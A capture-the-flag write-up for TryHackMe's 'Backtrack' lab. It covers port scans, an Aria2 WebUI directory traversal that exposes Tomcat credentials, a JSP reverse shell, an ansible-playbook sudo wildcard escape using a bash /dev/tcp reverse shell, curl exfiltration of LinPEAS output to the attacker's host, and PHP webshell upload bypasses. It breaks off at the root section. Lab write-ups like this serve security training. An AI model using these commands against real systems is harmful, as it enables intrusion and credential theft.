🏃♂️Backtrack
License
The following post by anthonyjsaab is licensed under CC BY 4.0
0 - Introduction
Created by tryhackme, 0utc4st, and YoloSaimo
1 - Port Scans
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -p- backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 06:57 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6800/tcp open unknown
8080/tcp open http-proxy
8888/tcp open sun-answerbook
Nmap done: 1 IP address (1 host up) scanned in 250.16 seconds1b - Versions and OS
┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -p22,6800,8080,8888 backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 07:02 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| 256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
|_ 256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
8080/tcp open http Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
8888/tcp open sun-answerbook?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html
| Date: Sat, 12 Oct 2024 04:02:31 GMT
| Connection: close
| <!doctype html>
| <html>
| <!-- {{{ head -->
| <head>
| <link rel="icon" href="../favicon.ico" />
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <meta name="theme-color" content="#0A8476">
| <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
| <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
| <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
| <!-- }}} -->
| <body ng-controller="MainCtrl" ng-cloak>
| <!-- {{{ Icons -->
|_ <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.94SVN%I=7%D=10/12%Time=6709F4D8%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,13F0,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html
--SNIP--
SF:olute;\x20width:\x200;\x20height:\x200;\x20overflow:\x20hidden;\"\x20ve
SF:rsion=\"1\.1\"\x20xm");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 97.57 ms 10.11.0.1
2 95.60 ms backtrack.thm (10.10.237.46)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.03 seconds2 - Aria2 WebUI
2a - Finding the vuln
The HTTP server on port 8888 returns a WebUI called Aria2 WebUI. Quickly searching for a vuln on Google:
2b - Directory Traversal
After clearing the cache on the browser, proxying all requests to Burp and holding the requests for a while without forwarding, we can see how the WebUI behaves and what it sends without having to go through the code. We intercept multiple requests without interacting with the browser, but this is the one we are interested in:
Amazing! This is a great way to look inside the targets files.
2c - Gathering sensitive info
Trying to brute-force some well-known files using Intruder crashes the Aria server. We have to access files manually in order not to overwhelm and crash the server.
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--SNIP--
mysql:x:113:122:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash/proc/self/environ
LANG=C.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOME=/opt/tomcatLOGNAME=tomcatUSER=tomcatINVOCATION_ID=90e09872525649ba9f513bc55f24ad23JOURNAL_STREAM=9:20272/opt/tomcat/conf/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<role rolename="manager-script"/>
<user username="tomcat" password="OPx52k53D8OkTZpx4fr" roles="manager-script"/>
</tomcat-users>2z - What we know so far
There are 4 accounts that can be considered human based on their ids: root, tomcat, orville and wilbur
We cannot login using tomcat through ssh (/bin/false)
We collected a password from a well-known configuration file for tomcat
The server on port 8888 runs with privileges of the tomcat user
3 - Foothold
3a - Dead-ends
id_rsa
Trying to collect the private key of the users (except tomcat) did not yield anything
authorized_keys
Trying to authorize my own key by writing to the respective .ssh folders did not work because of a lack of adequate permissions for the tomcat user:
3b - Tomcat, help!
The tomcat admin credentials we got were great, but the user in question has no useful privileges. This is because its role is only 'manager-script'.
We have to find a way to elevate this tomcat user. This can be done only by editing the /opt/tomcat/conf/tomcat-users.xml file. But how can we do that?
Well, since we already know that the server on port 8888 has the Linux 'tomcat' user's privileges, the server can probably overwrite tomcat-users.xml by downloading a new one!
I will host the following file on my machine, where the roles are significantly higher:
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<role rolename="manager-script"/>
<user username="tomcat" password="OPx52k53D8OkTZpx4fr" roles="admin-gui,admin-script,manager-gui,manager-status,manager-script,manager-jmx"/>
</tomcat-users>And now using the Aria2 WebUI:
3c - Have I been here before?
If you look closely at the /manager/html panel above, you will notice a path called /reverse_shell!
Requesting it gives us the following:
I am not sure what is happening here, but it is not worth investigating. I do have enough privileges to upload a shell of my own. I will be using a webshell that is bundled in /usr/share/webshells/jsp/jsp-reverse.jsp.
┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.164.14] 38942
id
uid=1002(tomcat) gid=1002(tomcat) groups=1002(tomcat)
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@Backtrack:~$ ls -la /opt/tomcat/flag1.txt
ls -la /opt/tomcat/flag1.txt
-rw-r--r-- 1 tomcat tomcat 38 Mar 9 2024 /opt/tomcat/flag1.txt4 - Lateral PrivEsc
4a - LinPEAS
Downloading LinPEAS on target and storing output
tomcat@Backtrack:/tmp$ wget http://10.11.85.12/linpeas.sh
wget http://10.11.85.12/linpeas.sh
--2024-10-12 14:31:24-- http://10.11.85.12/linpeas.sh
Connecting to 10.11.85.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 824745 (805K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 805.42K 790KB/s in 1.0s
2024-10-12 14:31:25 (790 KB/s) - ‘linpeas.sh’ saved [824745/824745]
tomcat@Backtrack:/tmp$ chmod u+x linpeas.sh
chmod u+x linpeas.sh
tomcat@Backtrack:/tmp$ ./linpeas.sh > tomcat-enum.txt
./linpeas.sh > tomcat-enum.txtEncoding and sending output
tomcat@Backtrack:/tmp$ cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
tomcat@Backtrack:/tmp$ curl -X POST --data-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
<a-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
curl: (1) Received HTTP/0.9 when not allowed
tomcat@Backtrack:/tmp$ Receiving and decoding output
┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 90 > tomcat-enum.txt.b64
listening on [any] 90 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.156.152] 40854
┌──(kali㉿kali)-[~/public_folder]
└─$ # removed HTTP headers from response, kept body
┌──(kali㉿kali)-[~/public_folder]
└─$ nano tomcat-enum.txt.b64
┌──(kali㉿kali)-[~/public_folder]
└─$ dos2unix tomcat-enum.txt.b64
dos2unix: converting file tomcat-enum.txt.b64 to Unix format...
┌──(kali㉿kali)-[~/public_folder]
└─$ cat tomcat-enum.txt.b64 | base64 -d > tomcat-enum.txt Here is the LinPEAS output:
4b - Wilbur
The following lead presented itself before I even ran LinPEAS:
tomcat@Backtrack:/$ sudo -l
sudo -l
Matching Defaults entries for tomcat on Backtrack:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tomcat may run the following commands on Backtrack:
(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.ymlThe wildcard above gives us great freedom! We can backtrack to a directory where we have stored a revshell command in a custom yml file:
tomcat@Backtrack:/tmp$ cat rev.yml
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/10.11.85.12/9003 0>&1'
tomcat@Backtrack:/tmp$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../../tmp/rev.yml
[WARNING]: provided hosts list is empty, only localhost is available. Note that
the implicit localhost does not match 'all'
--SNIP--
[WARNING]: Skipping plugin (/usr/lib/python3/dist-
packages/ansible/plugins/callback/sumologic.py) as it seems to be invalid:
module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'
PLAY [localhost] ***************************************************************
TASK [Gathering Facts] *********************************************************
ok: [localhost]
TASK [rev] *********************************************************************┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.238.90] 33938
wilbur@Backtrack:/tmp$ id
id
uid=1004(wilbur) gid=1004(wilbur) groups=1004(wilbur)
wilbur@Backtrack:/tmp$ cd ~
wilbur@Backtrack:~$ ls -la
total 36
drwxrwx--- 5 wilbur wilbur 4096 Oct 13 07:34 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 07:22 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
drwx------ 2 wilbur wilbur 4096 Oct 13 07:34 .cache
drwx------ 3 wilbur wilbur 4096 Oct 13 07:28 .gnupg
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat .just_in_case.txt
in case i forget :
wilbur:mYe317Tb9qTNrWFND7KF4c - Orville
Something promising appeared in the LinPEAS output, even before we moved to wilbur:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6800 0.0.0.0:* LISTEN 460/aria2c
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 547/java
tcp6 0 0 :::8080 :::* LISTEN 547/java
tcp6 0 0 :::6800 :::* LISTEN 460/aria2c
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8888 :::* LISTEN 473/nodeIt seems there is an HTTP server open on port 80, but only on the loopback interface. I wanted to be sure:
tomcat@Backtrack:/tmp$ wget http://127.0.0.1
wget http://127.0.0.1
--2024-10-12 19:11:39-- http://127.0.0.1/
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1264 (1.2K) [text/html]
Saving to: ‘index.html’
index.html 100%[===================>] 1.23K --.-KB/s in 0s
2024-10-12 19:11:39 (150 MB/s) - ‘index.html’ saved [1264/1264]There is definitely an HTTP server on this port! I need to open a proxy port to access it easily from Kali:
tomcat@Backtrack:/tmp$ wget http://10.11.85.12/socat
wget http://10.11.85.12/socat
--2024-10-12 19:00:49-- http://10.11.85.12/socat
Connecting to 10.11.85.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’
socat 100%[===================>] 366.38K 600KB/s in 0.6s
2024-10-12 19:00:49 (600 KB/s) - ‘socat’ saved [375176/375176]
tomcat@Backtrack:/tmp$ chmod u+x socat
chmod u+x socat
tomcat@Backtrack:/tmp$ ./socat -ddd TCP-LISTEN:2345,fork TCP:127.0.0.1:80
./socat -ddd TCP-LISTEN:2345,fork TCP:127.0.0.1:80With socat listening and proxying on the target machine, I am able to do this:
The website does not give us much wiggle room to try and exploit it from the browser. And it seemed like a dead-end. At least when I was tomcat. But now that I am wilbur, I had access to a very important file:
wilbur@Backtrack:~$ pwd
pwd
/home/wilbur
wilbur@Backtrack:~$ ls -la
ls -la
total 28
drwxrwx--- 3 wilbur wilbur 4096 Oct 13 03:57 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 03:57 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat fr*
cat fr*
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:
email : [email protected]
password : W34r3B3773r73nP3x3l$
wilbur@Backtrack:~$ This was the missing puzzle piece! Now I can login and proceed:
We can see that there are no images yet. Let us upload as image of our own and see what happens.
Now the question is: can we upload a shell? I will try to upload my favorite PHP webshell:
We have to bypass these filters:
However, trying to go to http://backtrack.thm:2345/uploads/shell.gif.php just downloads the file! But we see that in the root directory (above uploads/), where login.php and dashboard.php are stored, the PHP files are rendered instead of sent as is. Dead ends:
Apache/2.4.41 does not have a known directory traversal published, so storing it somewhere on the filesystem using wilbur and trying to access it through Apache won't work
/var/www/html is not accessible using any of the users we compromised
We can however try to add some backtraces to the filename:
Using a simple backtrace will store the file in uploads/. So it fails. We have to use Intruder to try and store it anywhere above uploads/ (ideally just above it). To do that, we will use a famous repo's wordlist:
5 - ROOT
Last updated
Was this helpful?